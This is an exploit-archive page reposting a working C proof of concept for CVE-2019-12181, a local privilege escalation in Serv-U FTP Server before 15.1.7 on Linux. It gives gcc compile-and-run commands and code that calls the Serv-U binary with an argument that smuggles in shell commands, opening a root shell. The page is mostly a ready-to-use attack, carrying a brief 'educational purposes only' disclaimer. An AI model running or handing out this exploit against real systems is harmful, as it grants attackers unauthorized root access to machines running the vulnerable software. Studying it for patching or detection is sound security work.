Servu ftp server < 15.1.7 local privilege escalation (1) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-06-18 | Type : local | Platform : linux
This exploit / vulnerability Servu ftp server < 15.1.7 local privilege escalation (1) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}

Servu ftp server < 15.1.7 local privilege escalation (1)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Servu ftp server < 15.1.7 local privilege escalation (1) Vulnerability / Exploit